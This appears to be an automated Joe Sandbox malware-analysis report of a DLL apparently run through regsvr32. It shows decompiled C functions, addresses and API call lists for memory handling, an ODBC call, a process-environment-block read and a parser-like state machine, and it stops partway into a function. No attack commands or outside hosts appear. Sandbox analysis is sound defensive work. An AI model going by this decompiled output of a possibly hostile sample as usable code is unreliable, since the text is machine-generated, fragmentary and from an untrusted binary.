Associated: 00000009.00000001.1625216526.10018000.00000008.sdmp
Associated: 00000009.00000001.1625873333.10027000.00000004.sdmp
Associated: 00000009.00000001.1626507849.10029000.00000008.sdmp
Associated: 00000009.00000001.1627117946.1002C000.00000004.sdmp
Associated: 00000009.00000001.1627726936.1002D000.00000002.sdmp

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_1_10000000_regsvr32.jbxd

Function 10009068, Relevance: 1.5, APIs: 1, Instructions: 25

C-Code - Quality: 21%

			E10009068(intOrPtr _a4, intOrPtr _a8) {
				signed int* _t6;
				void* _t9;
				intOrPtr _t12;

				_t12 = _a4;
				_t6 = E1000AA6C(_t12 + 0x1c, 0xc);
				_push(_t6);
				 *_t6 =  *_t6 | 0xffffffff;
				_push(0);
				_push(0);
				_push(0);
				_push(1);
				_push(0xc);
				_push(0xfffffff8);
				_push(1);
				_t9 = _a8 + 1;
				_push(_t9);
				_push( *((intOrPtr*)(_t12 + 8)));
				L100073CB();
				return _t9;
			}

0x10009069
0x10009073
0x1000907a
0x1000907b
0x10009080
0x10009081
0x10009082
0x10009087
0x10009089
0x1000908b
0x1000908d
0x1000908f
0x10009090
0x10009091
0x10009094
0x1000909a

APIs

Part of subcall function 1000AA6C: HeapAlloc.KERNEL32(00000008,?,10008B6A,?,?,?), ref: 1000AA78

SQLBindParameter.ODBC32(?,?,00000001,000000F8,0000000C,00000001,00000000,00000000,00000000,00000000), ref: 10009094

Memory Dump Source

Source File: 00000009.00000001.1623819899.10001000.00000020.sdmp, Offset: 10000000, based on PE: true

Associated: 00000009.00000001.1623173929.10000000.00000002.sdmp
Associated: 00000009.00000001.1624611607.10014000.00000002.sdmp
Associated: 00000009.00000001.1625216526.10018000.00000008.sdmp
Associated: 00000009.00000001.1625873333.10027000.00000004.sdmp
Associated: 00000009.00000001.1626507849.10029000.00000008.sdmp
Associated: 00000009.00000001.1627117946.1002C000.00000004.sdmp
Associated: 00000009.00000001.1627726936.1002D000.00000002.sdmp

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_1_10000000_regsvr32.jbxd

Function 100032DB, Relevance: .0, Instructions: 3

C-Code - Quality: 100%

			E100032DB() {

				return  *[fs:0x30];
			}

0x00000000

Memory Dump Source

Source File: 00000009.00000001.1623819899.10001000.00000020.sdmp, Offset: 10000000, based on PE: true

Associated: 00000009.00000001.1623173929.10000000.00000002.sdmp
Associated: 00000009.00000001.1624611607.10014000.00000002.sdmp
Associated: 00000009.00000001.1625216526.10018000.00000008.sdmp
Associated: 00000009.00000001.1625873333.10027000.00000004.sdmp
Associated: 00000009.00000001.1626507849.10029000.00000008.sdmp
Associated: 00000009.00000001.1627117946.1002C000.00000004.sdmp
Associated: 00000009.00000001.1627726936.1002D000.00000002.sdmp

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_1_10000000_regsvr32.jbxd

Function 1000B8F0, Relevance: 16.4, APIs: 13, Instructions: 169

C-Code - Quality: 100%

			E1000B8F0() {
				void* _t69;
				void* _t71;
				void* _t73;
				unsigned int _t74;
				void* _t77;
				void* _t78;
				void* _t119;
				void* _t127;
				void* _t128;
				void* _t132;
				void* _t133;
				void* _t134;
				void* _t135;
				void* _t136;
				void* _t137;

				_t69 = calloc(1, 8);
				_t132 = _t69;
				_t134 = _t133 + 8;
				if(_t132 != 0) {
					_t119 = calloc(1, 0x1f8);
					_t135 = _t134 + 8;
					 *_t132 = _t119;
					if(_t119 != 0) {
						_t71 = calloc(1, 0x17f8);
						_t136 = _t135 + 8;
						 *(_t132 + 4) = _t71;
						if(_t71 != 0) {
							 *((intOrPtr*)( *(_t132 + 4) + 0x3c)) = E1000FB60();
							_t73 =  *(_t132 + 4);
							if( *((intOrPtr*)(_t73 + 0x3c)) != 0) {
								 *((intOrPtr*)(_t73 + 0x468)) = 0x10;
								_t127 =  *(_t132 + 4);
								_t74 =  *0x10017120; // 0x20
								_t77 = malloc((_t74 >> 3) *  *(_t127 + 0x468));
								_t137 = _t136 + 4;
								 *(_t127 + 0x460) = _t77;
								_t78 =  *(_t132 + 4);
								if(_t77 != 0) {
									 *((intOrPtr*)(_t78 + 0x40)) = 0;
									_t128 = 0;
									 *((intOrPtr*)( *(_t132 + 4) + 0x60)) = 0;
									 *((intOrPtr*)( *(_t132 + 4) + 0xdf0)) = 0;
									 *((intOrPtr*)( *(_t132 + 4) + 0x44)) = 0;
									 *((intOrPtr*)( *(_t132 + 4) + 0x64)) = 0;
									 *((intOrPtr*)( *(_t132 + 4) + 0xdf4)) = 0;
									 *((intOrPtr*)( *(_t132 + 4) + 0x48)) = 0;
									 *((intOrPtr*)( *(_t132 + 4) + 0x68)) = 0;
									 *((intOrPtr*)( *(_t132 + 4) + 0xdf8)) = 0;
									 *((intOrPtr*)( *(_t132 + 4) + 0x4c)) = 0;
									 *((intOrPtr*)( *(_t132 + 4) + 0x6c)) = 0;
									 *((intOrPtr*)( *(_t132 + 4) + 0xdfc)) = 0;
									 *((intOrPtr*)( *(_t132 + 4) + 0x50)) = 0;
									 *((intOrPtr*)( *(_t132 + 4) + 0x70)) = 0;
									 *((intOrPtr*)( *(_t132 + 4) + 0xe00)) = 0;
									 *((intOrPtr*)( *(_t132 + 4) + 0x54)) = 0;
									 *((intOrPtr*)( *(_t132 + 4) + 0x74)) = 0;
									 *((intOrPtr*)( *(_t132 + 4) + 0xe04)) = 0;
									 *((intOrPtr*)( *(_t132 + 4) + 0x58)) = 0;
									 *((intOrPtr*)( *(_t132 + 4) + 0x78)) = 0;
									 *((intOrPtr*)( *(_t132 + 4) + 0xe08)) = 0;
									 *((intOrPtr*)( *(_t132 + 4) + 0x5c)) = 0;
									 *((intOrPtr*)( *(_t132 + 4) + 0x7c)) = 0;
									 *((intOrPtr*)( *(_t132 + 4) + 0xe0c)) = 0;
									 *((intOrPtr*)( *(_t132 + 4) + 0xe0)) = 0;
									 *((intOrPtr*)( *(_t132 + 4) + 0xe4)) = 0;
									 *((intOrPtr*)( *(_t132 + 4) + 0xfc)) = 0;
									do {
										E100109F0( *(_t132 + 4) - 0xffffff80 + _t128);
										_t128 = _t128 + 0xc;
										_t137 = _t137 + 4;
									} while (_t128 < 0x60);
									 *((intOrPtr*)( *(_t132 + 4) + 0x38)) = 0;
									E1000F670(_t132);
									 *( *_t132) = 9;
									return _t132;
								} else {
									E1000F9A0( *((intOrPtr*)(_t78 + 0x3c)));
									free( *(_t132 + 4));
									free( *_t132);
									free(_t132);
									return 0;
								}
							} else {
								free(_t73);
								free( *_t132);
								free(_t132);
								return 0;
							}
						} else {
							free(_t119);
							free(_t132);
							return 0;
						}
					} else {
						free(_t132);
						return 0;
					}
				} else {
					return _t69;
				}
			}

0x1000b8fc
0x1000b8fe
0x1000b900
0x1000b905
0x1000b914
0x1000b916
0x1000b919
0x1000b91d
0x1000b936
0x1000b938
0x1000b93b
0x1000b940
0x1000b95f
0x1000b962
0x1000b969
0x1000b984
0x1000b98e
0x1000b991
0x1000b9a1
0x1000b9a7
0x1000b9aa
0x1000b9b2
0x1000b9b5
0x1000b9da
0x1000b9e1
0x1000b9e6
0x1000b9f0
0x1000b9fd
0x1000ba07
0x1000ba11
0x1000ba1e
0x1000ba28
0x1000ba32
0x1000ba3f
0x1000ba49
0x1000ba53
0x1000ba60
0x1000ba6a
0x1000ba74
0x1000ba81
0x1000ba8b
0x1000ba95
0x1000baa2
0x1000baac
0x1000bab6
0x1000bac3
0x1000bacd
0x1000bad7
0x1000bae4
0x1000baf1
0x1000bafe
0x1000bb08
0x1000bb11
0x1000bb16
0x1000bb19
0x1000bb1c
0x1000bb25
0x1000bb2c
0x1000bb37
0x1000bb41
0x1000b9b7
0x1000b9ba
0x1000b9c8
0x1000b9cc
0x1000b9cf
0x1000b9d9
0x1000b9d9
0x1000b96b
0x1000b972
0x1000b976
0x1000b979
0x1000b983
0x1000b983
0x1000b942
0x1000b949
0x1000b94c
0x1000b956
0x1000b956
0x1000b91f
0x1000b920
0x1000b92e
0x1000b92e
0x1000b909
0x1000b909
0x1000b909

APIs

calloc.MSVCRT ref: 1000B8FC
calloc.MSVCRT ref: 1000B912
free.MSVCRT(00000000), ref: 1000B920
calloc.MSVCRT ref: 1000B936
free.MSVCRT(00000000), ref: 1000B949
free.MSVCRT(00000000), ref: 1000B94C

Part of subcall function 1000FB60: calloc.MSVCRT ref: 1000FB64

free.MSVCRT(?), ref: 1000B972
free.MSVCRT(00000000), ref: 1000B976
free.MSVCRT(00000000), ref: 1000B979
malloc.MSVCRT ref: 1000B9A1
free.MSVCRT(?,?), ref: 1000B9C8
free.MSVCRT(00000000), ref: 1000B9CC
free.MSVCRT(00000000), ref: 1000B9CF

Part of subcall function 1000F670: memset.MSVCRT ref: 1000F6E8

Part of subcall function 1000F9A0: free.MSVCRT(?,00000000,1000B9BF,?), ref: 1000F9AC
Part of subcall function 1000F9A0: free.MSVCRT(1000B9BF,00000000), ref: 1000F9ED

Memory Dump Source

Source File: 00000009.00000001.1623819899.10001000.00000020.sdmp, Offset: 10000000, based on PE: true

Associated: 00000009.00000001.1623173929.10000000.00000002.sdmp
Associated: 00000009.00000001.1624611607.10014000.00000002.sdmp
Associated: 00000009.00000001.1625216526.10018000.00000008.sdmp
Associated: 00000009.00000001.1625873333.10027000.00000004.sdmp
Associated: 00000009.00000001.1626507849.10029000.00000008.sdmp
Associated: 00000009.00000001.1627117946.1002C000.00000004.sdmp
Associated: 00000009.00000001.1627726936.1002D000.00000002.sdmp

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_1_10000000_regsvr32.jbxd

Function 1000D430, Relevance: 14.1, APIs: 11, Instructions: 375

C-Code - Quality: 81%

			E1000D430(void* __eflags, intOrPtr* _a4) {
				void* _v8;
				void* _v12;
				void* _v128;
				void* _v148;
				void* _v152;
				void* _v156;
				void* _v160;
				int _v168;
				intOrPtr _v172;
				signed int _v176;
				void* _v180;
				signed int _v184;
				int _v188;
				signed int _v192;
				signed int _v196;
				void* _t105;
				void* _t110;
				void* _t114;
				signed int _t116;
				void* _t122;
				intOrPtr _t124;
				void* _t128;
				void* _t134;
				unsigned int _t135;
				void* _t138;
				unsigned int _t139;
				void* _t142;
				void* _t144;
				intOrPtr _t146;
				void* _t149;
				intOrPtr _t152;
				intOrPtr _t163;
				signed int _t164;
				void* _t166;
				intOrPtr* _t167;
				void* _t168;
				signed int _t169;
				intOrPtr* _t172;
				int _t174;
				void* _t182;
				intOrPtr* _t183;
				signed int* _t191;
				signed int* _t192;
				signed int* _t193;

				_t183 = _a4;
				_t105 = E1000FC80( *((intOrPtr*)( *((intOrPtr*)(_t183 + 4)) + 0x3c)),  &_v180,  *0x100171f0);
				_t191 =  &(( &_v196)[3]);
				if(_t105 != 0) {
					__eflags = _v180;
					_v192 = 0 | _v180 != 0x00000000;
					_t110 = E1000FC80( *((intOrPtr*)( *((intOrPtr*)(_t183 + 4)) + 0x3c)),  &_v196,  *0x100171f4);
					_t192 =  &(_t191[3]);
					__eflags = _t110;
					if(_t110 == 0) {
						goto L1;
					} else {
						_t114 = E1000FC80( *((intOrPtr*)( *((intOrPtr*)(_t183 + 4)) + 0x3c)),  &_v188,  *0x100171f8);
						_t193 =  &(_t192[3]);
						__eflags = _t114;
						if(_t114 == 0) {
							goto L1;
						} else {
							_t164 = _v196;
							_t169 = _v192;
							__eflags = _t164;
							if(__eflags != 0) {
								__eflags = _t164 - 3;
								if(_t164 != 3) {
									_t156 =  *((intOrPtr*)(_t183 + 4));
									_t174 = _v188;
									__eflags =  *( *((intOrPtr*)(_t183 + 4)) + 0x260 + _t164 * 4);
									_v172 = _t169;
									_t116 = 0 |  *( *((intOrPtr*)(_t183 + 4)) + 0x260 + _t164 * 4) == 0x00000000;
									_v176 = _t164;
									_v184 = _t116;
									_v168 = _t174;
									__eflags = _t164 - 2;
									if(_t164 != 2) {
										L27:
										__eflags = _t116;
										if(_t116 == 0) {
											__eflags = _t164 - 6;
											if(__eflags > 0) {
												__eflags = _t174;
												if(_t174 == 0) {
													_v160 = 0;
													goto L51;
												} else {
													_t128 = malloc(_t174);
													_v160 = _t128;
													goto L45;
												}
											} else {
												switch( *((intOrPtr*)(_t164 * 4 +  &M1000D8B0))) {
													case 0:
														L51:
														_t117 = _v156;
														goto L52;
													case 1:
														_t133 = E100106C0( *((intOrPtr*)(_t156 + 0x3c)), _t174);
														_t193 =  &(_t193[2]);
														__eflags = _t133;
														if(_t133 != 0) {
															goto L42;
														} else {
															return _t133;
														}
														goto L94;
													case 2:
														__eflags = __edi;
														if(__edi == 0) {
															__eax = 0;
															_v156 = 0;
															L52:
															_t170 =  *((intOrPtr*)(_t183 + 4));
															__eflags =  *(_t170 + 0xe18);
															if( *(_t170 + 0xe18) == 0) {
																_t177 =  *(_t170 + 0x1c);
																__eflags = _t177;
																if(_t177 != 0) {
																	_push( *((intOrPtr*)(_t170 + 0x34)));
																	_push( &_v176);
																	_push(_t183);
																	 *_t177();
																	_t164 = _v196;
																	_t193 =  &(_t193[3]);
																	_t117 = _v156;
																}
															}
															__eflags = _t164 - 6;
															if(_t164 > 6) {
																L85:
																_t118 = _v160;
																goto L86;
															} else {
																switch( *((intOrPtr*)(_t164 * 4 +  &M1000D8CC))) {
																	case 0:
																		goto L85;
																	case 1:
																		goto L89;
																	case 2:
																		L86:
																		__eflags = _t118;
																		if(_t118 != 0) {
																			free(_t118);
																			goto L88;
																		}
																		goto L89;
																	case 3:
																		__eflags = _t117;
																		if(_t117 != 0) {
																			free(_t117);
																			_t193 =  &(_t193[1]);
																		}
																		_t165 = _v152;
																		__eflags = _t165;
																		if(_t165 == 0) {
																			L66:
																			_t125 = _v148;
																		} else {
																			_t176 = 0;
																			__eflags = _t165;
																			if(_t165 == 0) {
																				goto L66;
																			} else {
																				_t125 = _v148;
																				do {
																					_t171 =  *(_t125 + 4 + _t176 * 8);
																					__eflags = _t171;
																					if(_t171 != 0) {
																						free(_t171);
																						_t125 = _v148;
																						_t193 =  &(_t193[1]);
																						_t165 = _v152;
																					}
																					_t176 = _t176 + 1;
																					__eflags = _t176 - _t165;
																				} while (_t176 < _t165);
																			}
																		}
																		__eflags = _t125;
																		if(_t125 != 0) {
																			free(_t125);
																			goto L88;
																		}
																		goto L89;
																	case 4:
																		__ecx = _v12;
																		__eflags = __ecx;
																		if(__ecx == 0) {
																			L76:
																			__eax = _v8;
																		} else {
																			__edi = 0;
																			__eflags = __ecx;
																			if(__ecx == 0) {
																				goto L76;
																			} else {
																				__eax = _v8;
																				__ebx = 0;
																				__eflags = 0;
																				do {
																					__edx =  *(__ebx + __eax + 0x20);
																					__eflags = __edx;
																					if(__edx != 0) {
																						free(__edx);
																						__eax = _v8;
																						__esp = __esp + 4;
																						__ecx = _v12;
																					}
																					__edi = __edi + 1;
																					__ebx = __ebx + 0x28;
																					__eflags = __edi - __ecx;
																				} while (__edi < __ecx);
																			}
																		}
																		__eflags = __eax;
																		if(__eax != 0) {
																			free(__eax);
																			goto L88;
																		}
																		goto L89;
																	case 5:
																		__edi = free;
																		__eflags = __eax;
																		if(__eax != 0) {
																			free(__eax);
																		}
																		__eax = _v152;
																		__eflags = __eax;
																		if(__eax != 0) {
																			free(__eax);
																		}
																		__eax = _v128;
																		__eflags = __eax;
																		if(__eax != 0) {
																			free(__eax);
																			L88:
																			_t193 =  &(_t193[1]);
																		}
																		goto L89;
																}
															}
															goto L89;
														} else {
															_v156 = malloc(__edi);
															L45:
															_t195 =  &(_t193[1]);
															__eflags = _t128;
															if(_t128 != 0) {
																_t129 = E1000FB70( *((intOrPtr*)(_t156 + 0x3c)), _t128, _t174);
																_t193 =  &(_t195[3]);
																__eflags = _t129;
																if(_t129 != 0) {
																	goto L42;
																} else {
																	goto L49;
																}
															} else {
																 *((intOrPtr*)( *_t183)) = 8;
																goto L47;
															}
														}
														goto L94;
													case 3:
														__eax =  &_v160;
														__eax = E1000E130(__eflags, __esi,  &_v160);
														__eflags = __eax;
														if(__eax != 0) {
															goto L42;
														} else {
															_pop(__edi);
															_pop(__ebx);
															return __eax;
														}
														goto L94;
													case 4:
														__eax =  &_v160;
														_push( &_v160);
														_push(__esi);
														__eax = E1000D8F0();
														__esp = __esp + 8;
														__eflags = __eax;
														if(__eax != 0) {
															goto L42;
														} else {
															_pop(__edi);
															_pop(__ebx);
															return __eax;
														}
														goto L94;
													case 5:
														__eax =  &_v160;
														__eax = E1000DC00(__eflags, __esi,  &_v160);
														__eflags = __eax;
														if(__eax == 0) {
															L47:
															__eflags = 0;
															return 0;
														} else {
															L42:
															_t164 = _v196;
															goto L51;
														}
														goto L94;
												}
											}
										} else {
											_t134 = E100106C0( *((intOrPtr*)(_t156 + 0x3c)), _t174);
											_t193 =  &(_t193[2]);
											__eflags = _t134;
											if(_t134 != 0) {
												goto L89;
											} else {
												return _t134;
											}
										}
									} else {
										_t135 =  *0x10017120; // 0x20
										_t138 = E1000FB70( *((intOrPtr*)(_t156 + 0x3c)),  &_v160, _t135 >> 3);
										_t193 =  &(_t193[3]);
										__eflags = _t138;
										if(_t138 == 0) {
											goto L49;
										} else {
											_t139 =  *0x10017120; // 0x20
											_t156 =  *((intOrPtr*)(_t183 + 4));
											_t174 = _t174 - (_t139 >> 3);
											__eflags =  *(_t156 + 0x464);
											if( *(_t156 + 0x464) <= 0) {
												L25:
												_t116 = _v184;
											} else {
												_t142 = E1000C4F0(_t183,  &_v160);
												_t193 =  &(_t193[2]);
												__eflags = _t142;
												if(_t142 == 0) {
													goto L25;
												} else {
													__eflags = _v184;
													_t116 = 0 | _v184 == 0x00000000;
												}
											}
											_t164 = _v196;
											goto L27;
										}
									}
								} else {
									_t144 = E1000DDC0(_t183, _t169, _v188);
									_t193 =  &(_t193[3]);
									__eflags = _t144;
									if(_t144 == 0) {
										goto L49;
									} else {
										 *((intOrPtr*)( *((intOrPtr*)(_t183 + 4)) + 0xfc)) = 1;
										_t146 =  *((intOrPtr*)(_t183 + 4));
										__eflags =  *(_t146 + 0xe18);
										if( *(_t146 + 0xe18) == 0) {
											__eflags =  *(_t146 + 0x26c);
											if( *(_t146 + 0x26c) != 0) {
												_t166 =  *(_t146 + 0x1c);
												__eflags = _t166;
												if(_t166 != 0) {
													 *_t166(_t183, _t146 + 0x1b0,  *((intOrPtr*)(_t146 + 0x34)));
													_t193 =  &(_t193[3]);
												}
											}
										}
										goto L89;
									}
								}
							} else {
								_push(_v188);
								_push(_t169);
								_push(_t183);
								_t149 = E1000DF40(__eflags);
								_t193 =  &(_t193[3]);
								__eflags = _t149;
								if(_t149 == 0) {
									L49:
									__eflags = 0;
									return 0;
								} else {
									_t172 = 0x10016ea8;
									_t182 = 0xc;
									 *((intOrPtr*)( *((intOrPtr*)(_t183 + 4)) + 0xf8)) = 1;
									_t163 =  *((intOrPtr*)(_t183 + 4));
									_t167 = _t163 + 0x138;
									while(1) {
										__eflags =  *_t167 -  *_t172;
										if( *_t167 !=  *_t172) {
											break;
										}
										_t167 = _t167 + 4;
										_t172 = _t172 + 4;
										_t182 = _t182 - 4;
										__eflags = _t182;
										if(_t182 >= 0) {
											continue;
										} else {
											 *((intOrPtr*)(_t163 + 0xe10)) = 0;
										}
										break;
									}
									_t152 =  *((intOrPtr*)(_t183 + 4));
									__eflags =  *(_t152 + 0xe18);
									if( *(_t152 + 0xe18) == 0) {
										__eflags =  *(_t152 + 0x260);
										if( *(_t152 + 0x260) != 0) {
											_t168 =  *(_t152 + 0x1c);
											__eflags = _t168;
											if(_t168 != 0) {
												 *_t168(_t183, _t152 + 0x100,  *((intOrPtr*)(_t152 + 0x34)));
												_t193 =  &(_t193[3]);
											}
										}
									}
									L89:
									__eflags = _v192;
									if(_v192 != 0) {
										_t122 = E1000B7C0(_t183,  *((intOrPtr*)(_t183 + 4)) + 0x17e0);
										__eflags = _t122;
										if(_t122 == 0) {
											_t124 =  *((intOrPtr*)(_t183 + 4));
											 *((intOrPtr*)(_t124 + 0x17e0)) = 0;
											 *((intOrPtr*)(_t124 + 0x17e4)) = 0;
										}
										 *((intOrPtr*)( *_t183)) = 2;
									}
									return 1;
								}
							}
						}
					}
				} else {
					L1:
					return 0;
				}
				L94:
			}

0x1000d441
0x1000d44f
0x1000d454
0x1000d459
0x1000d46d
0x1000d474
0x1000d483
0x1000d488
0x1000d48b
0x1000d48d
0x00000000
0x1000d48f
0x1000d4a0
0x1000d4a5
0x1000d4a8
0x1000d4aa
0x00000000
0x1000d4ac
0x1000d4ac
0x1000d4b0
0x1000d4b7
0x1000d4b9
0x1000d54c
0x1000d54f
0x1000d5b0
0x1000d5b5
0x1000d5b9
0x1000d5c0
0x1000d5c4
0x1000d5c7
0x1000d5cb
0x1000d5cf
0x1000d5d3
0x1000d5d6
0x1000d634
0x1000d634
0x1000d636
0x1000d657
0x1000d65a
0x1000d6f0
0x1000d6f2
0x1000d739
0x00000000
0x1000d6f4
0x1000d6f5
0x1000d6fb
0x00000000
0x1000d6fb
0x1000d660
0x1000d660
0x00000000
0x1000d741
0x1000d741
0x00000000
0x00000000
0x1000d66b
0x1000d670
0x1000d673
0x1000d675
0x00000000
0x1000d677
0x1000d681
0x1000d681
0x00000000
0x00000000
0x1000d682
0x1000d684
0x1000d693
0x1000d695
0x1000d745
0x1000d745
0x1000d748
0x1000d74f
0x1000d751
0x1000d754
0x1000d756
0x1000d758
0x1000d75f
0x1000d760
0x1000d761
0x1000d763
0x1000d767
0x1000d76a
0x1000d76a
0x1000d756
0x1000d76e
0x1000d771
0x1000d852
0x1000d852
0x00000000
0x1000d777
0x1000d777
0x00000000
0x00000000
0x00000000
0x00000000
0x00000000
0x1000d856
0x1000d856
0x1000d858
0x1000d85b
0x00000000
0x1000d85b
0x00000000
0x00000000
0x1000d784
0x1000d786
0x1000d789
0x1000d78b
0x1000d78b
0x1000d78e
0x1000d792
0x1000d794
0x1000d7bd
0x1000d7bd
0x1000d796
0x1000d796
0x1000d798
0x1000d79a
0x00000000
0x1000d79c
0x1000d79c
0x1000d7a0
0x1000d7a0
0x1000d7a4
0x1000d7a6
0x1000d7a9
0x1000d7ab
0x1000d7af
0x1000d7b2
0x1000d7b2
0x1000d7b6
0x1000d7b7
0x1000d7b7
0x1000d7bb
0x1000d79a
0x1000d7c1
0x1000d7c3
0x1000d7ca
0x00000000
0x1000d7ca
0x00000000
0x00000000
0x1000d7d1
0x1000d7de
0x1000d7e0
0x1000d817
0x1000d817
0x1000d7e2
0x1000d7e2
0x1000d7e4
0x1000d7e6
0x00000000
0x1000d7e8
0x1000d7e8
0x1000d7ef
0x1000d7ef
0x1000d7f1
0x1000d7f1
0x1000d7f5
0x1000d7f7
0x1000d7fa
0x1000d7fc
0x1000d803
0x1000d806
0x1000d806
0x1000d80d
0x1000d80e
0x1000d811
0x1000d811
0x1000d815
0x1000d7e6
0x1000d81e
0x1000d820
0x1000d823
0x00000000
0x1000d823
0x00000000
0x00000000
0x1000d827
0x1000d82d
0x1000d82f
0x1000d832
0x1000d834
0x1000d837
0x1000d83b
0x1000d83d
0x1000d840
0x1000d842
0x1000d845
0x1000d849
0x1000d84b
0x1000d84e
0x1000d861
0x1000d861
0x1000d861
0x00000000
0x00000000
0x1000d777
0x00000000
0x1000d686
0x1000d68d
0x1000d6ff
0x1000d6ff
0x1000d702
0x1000d704
0x1000d720
0x1000d725
0x1000d728
0x1000d72a
0x00000000
0x00000000
0x00000000
0x00000000
0x1000d706
0x1000d708
0x00000000
0x1000d708
0x1000d704
0x00000000
0x00000000
0x1000d69e
0x1000d6a4
0x1000d6ac
0x1000d6ae
0x00000000
0x1000d6b0
0x1000d6b0
0x1000d6b2
0x1000d6ba
0x1000d6ba
0x00000000
0x00000000
0x1000d6bb
0x1000d6bf
0x1000d6c0
0x1000d6c1
0x1000d6c6
0x1000d6c9
0x1000d6cb
0x00000000
0x1000d6cd
0x1000d6cd
0x1000d6cf
0x1000d6d7
0x1000d6d7
0x00000000
0x00000000
0x1000d6d8
0x1000d6de
0x1000d6e6
0x1000d6e8
0x1000d70e
0x1000d711
0x1000d71a
0x1000d6ea
0x1000d6ea
0x1000d6ea
0x00000000
0x1000d6ea
0x00000000
0x00000000
0x1000d660
0x1000d638
0x1000d63c
0x1000d641
0x1000d644
0x1000d646
0x00000000
0x1000d64c
0x1000d656
0x1000d656
0x1000d646
0x1000d5d8
0x1000d5d8
0x1000d5e9
0x1000d5ee
0x1000d5f1
0x1000d5f3
0x00000000
0x1000d5f9
0x1000d5f9
0x1000d5fe
0x1000d604
0x1000d606
0x1000d60d
0x1000d62c
0x1000d62c
0x1000d60f
0x1000d615
0x1000d61a
0x1000d61d
0x1000d61f
0x00000000
0x1000d621
0x1000d623
0x1000d627
0x1000d627
0x1000d61f
0x1000d630
0x00000000
0x1000d630
0x1000d5f3
0x1000d551
0x1000d557
0x1000d55c
0x1000d55f
0x1000d561
0x00000000
0x1000d567
0x1000d56a
0x1000d574
0x1000d577
0x1000d57e
0x1000d584
0x1000d58b
0x1000d591
0x1000d594
0x1000d596
0x1000d5a6
0x1000d5a8
0x1000d5a8
0x1000d596
0x1000d58b
0x00000000
0x1000d57e
0x1000d561
0x1000d4bf
0x1000d4bf
0x1000d4c3
0x1000d4c4
0x1000d4c5
0x1000d4ca
0x1000d4cd
0x1000d4cf
0x1000d72c
0x1000d72f
0x1000d738
0x1000d4d5
0x1000d4d8
0x1000d4dd
0x1000d4e2
0x1000d4ec
0x1000d4ef
0x1000d4f5
0x1000d4f7
0x1000d4f9
0x00000000
0x00000000
0x1000d4fb
0x1000d4fe
0x1000d501
0x1000d501
0x1000d504
0x00000000
0x1000d506
0x1000d506
0x1000d506
0x00000000
0x1000d504
0x1000d510
0x1000d513
0x1000d51a
0x1000d520
0x1000d527
0x1000d52d
0x1000d530
0x1000d532
0x1000d542
0x1000d544
0x1000d544
0x1000d532
0x1000d527
0x1000d864
0x1000d864
0x1000d869
0x1000d875
0x1000d87d
0x1000d87f
0x1000d881
0x1000d884
0x1000d88e
0x1000d88e
0x1000d89a
0x1000d89a
0x1000d8af
0x1000d8af
0x1000d4cf
0x1000d4b9
0x1000d4aa
0x1000d45b
0x1000d45b
0x1000d464
0x1000d464
0x00000000

APIs

free.MSVCRT(00000000), ref: 1000D85B

Part of subcall function 1000DDC0: realloc.MSVCRT ref: 1000DE19

malloc.MSVCRT ref: 1000D687

Part of subcall function 1000E130: malloc.MSVCRT ref: 1000E15B
Part of subcall function 1000E130: malloc.MSVCRT ref: 1000E1C8
Part of subcall function 1000E130: malloc.MSVCRT ref: 1000E21C

Part of subcall function 1000D8F0: memset.MSVCRT ref: 1000D901
Part of subcall function 1000D8F0: calloc.MSVCRT ref: 1000D9CF
Part of subcall function 1000D8F0: calloc.MSVCRT ref: 1000DB24

Part of subcall function 1000DC00: malloc.MSVCRT ref: 1000DC55
Part of subcall function 1000DC00: malloc.MSVCRT ref: 1000DCB5
Part of subcall function 1000DC00: malloc.MSVCRT ref: 1000DD7F

malloc.MSVCRT ref: 1000D6F5
free.MSVCRT(00000000,00000000), ref: 1000D789
free.MSVCRT(?,00000000), ref: 1000D7A9
free.MSVCRT(?,00000000), ref: 1000D7CA
free.MSVCRT(?), ref: 1000D7FA
free.MSVCRT(?), ref: 1000D823
free.MSVCRT(?), ref: 1000D832
free.MSVCRT(?), ref: 1000D840
free.MSVCRT(?), ref: 1000D84E

Memory Dump Source

Source File: 00000009.00000001.1623819899.10001000.00000020.sdmp, Offset: 10000000, based on PE: true

Associated: 00000009.00000001.1623173929.10000000.00000002.sdmp
Associated: 00000009.00000001.1624611607.10014000.00000002.sdmp
Associated: 00000009.00000001.1625216526.10018000.00000008.sdmp
Associated: 00000009.00000001.1625873333.10027000.00000004.sdmp
Associated: 00000009.00000001.1626507849.10029000.00000008.sdmp
Associated: 00000009.00000001.1627117946.1002C000.00000004.sdmp
Associated: 00000009.00000001.1627726936.1002D000.00000002.sdmp

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_1_10000000_regsvr32.jbxd

Function 1000C590, Relevance: 12.1, APIs: 8, Instructions: 72

APIs

__p__iob.MSVCRT(00000000,?,1000B89F,?,?,?,?,?,?,00000000,10007C39,00000000,?,10007F40,00000000,10007DC0), ref: 1000C5C6
__p__iob.MSVCRT(00008000,?,1000B89F,?,?,?,?,?,?,00000000,10007C39,00000000,?,10007F40,00000000,10007DC0), ref: 1000C5D5
_fileno.MSVCRT ref: 1000C5D8
_setmode.MSVCRT ref: 1000C5E2
__p__iob.MSVCRT ref: 1000C5EB
__p__iob.MSVCRT(1000C0C0,?,?,?,?,?,?,1000B89F,?,?,?,?,?,?,00000000,10007C39), ref: 1000C60E
__p__iob.MSVCRT(?,?,1000B89F,?,?,?,?,?,?,00000000,10007C39,00000000,?,10007F40,00000000,10007DC0), ref: 1000C623
__p__iob.MSVCRT(?,?,1000B89F,?,?,?,?,?,?,00000000,10007C39,00000000,?,10007F40,00000000,10007DC0), ref: 1000C638

Memory Dump Source

Source File: 00000009.00000001.1623819899.10001000.00000020.sdmp, Offset: 10000000, based on PE: true

Associated: 00000009.00000001.1623173929.10000000.00000002.sdmp
Associated: 00000009.00000001.1624611607.10014000.00000002.sdmp
Associated: 00000009.00000001.1625216526.10018000.00000008.sdmp
Associated: 00000009.00000001.1625873333.10027000.00000004.sdmp
Associated: 00000009.00000001.1626507849.10029000.00000008.sdmp
Associated: 00000009.00000001.1627117946.1002C000.00000004.sdmp
Associated: 00000009.00000001.1627726936.1002D000.00000002.sdmp

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_1_10000000_regsvr32.jbxd

Function 100123D0, Relevance: 10.8, APIs: 7, Instructions: 258

C-Code - Quality: 100%

			E100123D0(void* __eflags) {
				signed int* _t153;
				intOrPtr _t154;
				void* _t159;
